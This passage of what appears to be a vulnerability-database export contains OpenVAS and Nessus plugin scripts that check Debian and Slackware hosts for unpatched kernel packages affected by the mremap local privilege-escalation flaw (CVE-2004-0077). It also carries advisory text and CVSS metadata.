script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.22\", ver:\"2.2.22-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.22\", ver:\"2.2.22-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.22\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-generic\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-jensen\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-nautilus\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.22-smp\", ver:\"2.2.22-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 438-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53138", "href": "http://plugins.openvas.org/nasl.php?oid=53138", "type": "openvas", "title": "Debian Security Advisory DSA 438-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_438_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 438-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7\nof i386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem is fixed in version\n2.4.24-3 for source, i386 and alpha images and version 2.4.22-10 for\npowerpc images.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.18, kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-image-2.4.18-i386bf, kernel-patch-2.4.18-powerpc\nannounced via advisory DSA 438-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20438-1\";\n\nif(description)\n{\n script_id(53138);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 438-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.18\", ver:\"2.4.18-14.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.18\", ver:\"2.4.18-14.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.18-powerpc\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-generic\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-smp\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-generic\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-smp\", ver:\"2.4.18-14\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-386\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k6\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k7\", ver:\"2.4.18-12.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-bf2.4\", ver:\"2.4.18-5woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-bf2.4\", ver:\"2.4.18-5woody7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-newpmac\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-powerpc-smp\", ver:\"2.4.18-1woody4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-patch-2.4.17-mips\nannounced via advisory DSA 441-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53141", "href": "http://plugins.openvas.org/nasl.php?oid=53141", "type": "openvas", "title": "Debian Security Advisory DSA 441-1 (kernel-patch-2.4.17-mips)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_441_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 441-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the next upload of a 2.4.19 kernel image and in version\n2.4.22-0.030928.3 for 2.4.22 for the mips and mipsel architectures.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.17-mips\nannounced via advisory DSA 441-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20441-1\";\n\nif(description)\n{\n script_id(53141);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 441-1 (kernel-patch-2.4.17-mips)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-mips\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-ip22\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r5k-ip22\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r3k-kn02\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-kn04\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.17-0.020226.2.woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-049-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053944", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053944", "type": "openvas", "title": "Slackware Advisory SSA:2004-049-01 Kernel security update ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_049_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53944\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2003-0985\", \"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-049-01 Kernel security update \");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK9\\.1\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-049-01\");\n\n script_tag(name:\"insight\", value:\"New kernels are available for Slackware 9.1 and -current to fix\na bounds-checking problem in the kernel's mremap() call which\ncould be used by a local attacker to gain root privileges.\nPlease note that this is not the same issue as CVE-2003-0985\nwhich was fixed in early January.\n\nThe kernels in Slackware 8.1 and 9.0 that were updated in\nJanuary are not vulnerable to this new issue because the patch\nfrom Solar Designer that was used to fix the CVE-2003-0985 bugs\nalso happened to fix the problem that was discovered later.\n\nSites running Slackware 9.1 or -current should upgrade to a\nnew kernel. After installing the new kernel, be sure to run\n'lilo'.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-049-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"kernel-ide\", ver:\"2.4.24-i486-2\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"kernel-source\", ver:\"2.4.24-noarch-2\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T10:00:15", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-466-1 : linux-kernel-2.2.10-powerpc-apus - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.10", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.10-powerpc-apus"], "id": "DEBIAN_DSA-466.NASL", "href": "https://www.tenable.com/plugins/nessus/15303", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-466. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15303);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"466\");\n\n script_name(english:\"Debian DSA-466-1 : linux-kernel-2.2.10-powerpc-apus - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus\narchitecture and in version 2.2.10-2 of Linux 2.2.10 source.\n\nYou are strongly advised to switch to the fixed 2.4.17 kernel-image\npackage for powerpc/apus from woody until the 2.4.20 kernel-image\npackage is fixed in the unstable distribution.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.10-powerpc-apus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.10\", reference:\"2.2.10-2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.10-apus\", reference:\"2.2.10-13woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.10-apus\", reference:\"2.2.10-13woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.10\", reference:\"2.2.10-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:55:26", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-438-1 : linux-kernel-2.4.18-alpha+i386+powerpc - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-i386", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-1-alpha", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.18-i386bf", "p-cpe:/a:debian:debian_linux:kernel-patch-2.4.18-powerpc", "p-cpe:/a:debian:debian_linux:kernel-source-2.4.18"], "id": "DEBIAN_DSA-438.NASL", "href": "https://www.tenable.com/plugins/nessus/15275", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-438. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15275);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"438\");\n\n script_name(english:\"Debian DSA-438-1 : linux-kernel-2.4.18-alpha+i386+powerpc - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-438\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.18-14.2 of kernel-source, version 2.4.18-14 of alpha\nimages, version 2.4.18-12.2 of i386 images, version 2.4.18-5woody7 of\ni386bf images and version 2.4.18-1woody4 of powerpc images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 